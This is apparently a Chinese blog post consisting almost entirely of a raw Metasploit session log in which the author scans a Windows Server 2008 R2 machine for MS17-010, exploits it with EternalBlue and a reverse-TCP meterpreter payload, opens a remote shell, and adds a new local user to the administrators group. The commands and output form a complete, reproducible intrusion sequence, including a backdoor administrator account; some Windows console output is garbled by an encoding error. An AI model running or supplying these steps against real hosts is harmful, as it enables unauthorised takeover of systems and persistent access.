渗透2008R2 ms-17010


                                                                                                                                             
┌──(root💀laizr)-[~]
└─# msfconsole                                                       127 ⨯
                                                  

      .:okOOOkdc'           'cdkOOOko:.                                    
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.                                  
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:                                 
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'                                
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo                                
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx                                
  lOOOOOOOO.         ;d;         ,OOOOOOOOl                                
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.                                
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc                                 
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo                                  
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl                                   
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;                                    
       .dOOo   .OOOOocccxOOOO.   xOOd.                                     
         ,kOl  .OOOOOOOOOOOOO. .dOk,                                       
           :kk;.OOOOOOOOOOOOO.cOk:                                         
             ;kOOOOOOOOOOOOOOOk:                                           
               ,xOOOOOOOOOOOx,                                             
                 .lOOOOOOOl.                                               
                    ,dOd,                                                  
                      .                                                    

       =[ metasploit v6.0.15-dev                          ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the edit command to open the currently active module in your editor

msf6 > set RHOSTS 172.16.16.129
RHOSTS => 172.16.16.129
msf6 > run
[-] Unknown command: run.
msf6 >  use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 172.16.16.129
RHOSTS => 172.16.16.129
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 172.16.16.129:445     - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.16.129:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         172.16.16.129    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.16.46     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 172.16.16.129
rhost => 172.16.16.129
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.16.16.46
lhost => 172.16.16.46
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
lport => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 172.16.16.46:4444 
[*] 172.16.16.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.16.129:445     - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.16.129:445     - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.16.129:445 - Connecting to target for exploitation.
[+] 172.16.16.129:445 - Connection established for exploitation.
[+] 172.16.16.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.16.129:445 - CORE raw buffer dump (46 bytes)
[*] 172.16.16.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76  Windows Web Serv
[*] 172.16.16.129:445 - 0x00000010  65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20  er 2008 R2 7601 
[*] 172.16.16.129:445 - 0x00000020  53 65 72 76 69 63 65 20 50 61 63 6b 20 31        Service Pack 1  
[+] 172.16.16.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.16.129:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.16.129:445 - Sending all but last fragment of exploit packet
[*] 172.16.16.129:445 - Starting non-paged pool grooming
[+] 172.16.16.129:445 - Sending SMBv2 buffers
[+] 172.16.16.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.16.129:445 - Sending final SMBv2 buffers.
[*] 172.16.16.129:445 - Sending last fragment of exploit packet!
[*] 172.16.16.129:445 - Receiving response from exploit packet
[+] 172.16.16.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.16.129:445 - Sending egg to corrupted connection.
[*] 172.16.16.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.16.16.129
[*] Meterpreter session 1 opened (172.16.16.46:4444 -> 172.16.16.129:49251) at 2021-01-18 19:12:27 +0800
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > shell
Process 2808 created.                                                                          
Channel 1 created.                                                                             
Microsoft Windows [�汾 6.1.7601]                                                               
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����                                          

C:\Windows\system32>sysinfo
sysinfo
'sysinfo' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���

C:\Windows\system32>screenshot
screenshot
'screenshot' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���
C:\Windows\system32>net user
net user

\\ ���û��ʻ�

-------------------------------------------------------------------------------
Administrator            Guest                    
�����������ϣ�������һ��������������


C:\Windows\system32>net user laizr 123.com /add
net user laizr 123.com /add
�����ɹ����ɡ�


C:\Windows\system32>net                                              

C:\Windows\system32>sysinfo
sysinfo
'sysinfo' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���

C:\Windows\system32>net localgroup administrators laizr /add
net localgroup administrators laizr /add
�����ɹ����ɡ�


C:\Windows\system32>cd ..
cd ..

C:\Windows>cd...
cd...

C:\Windows>cd..
cd..

C:\>mkdir aaa
mkdir aaa

C:\>dir
dir
 ������ C �еľ�û�б�ǩ��
 ��������� 709C-5214


posted @ 2021-01-18 13:17  HelloBytes  阅读(271)  评论(0编辑  收藏  举报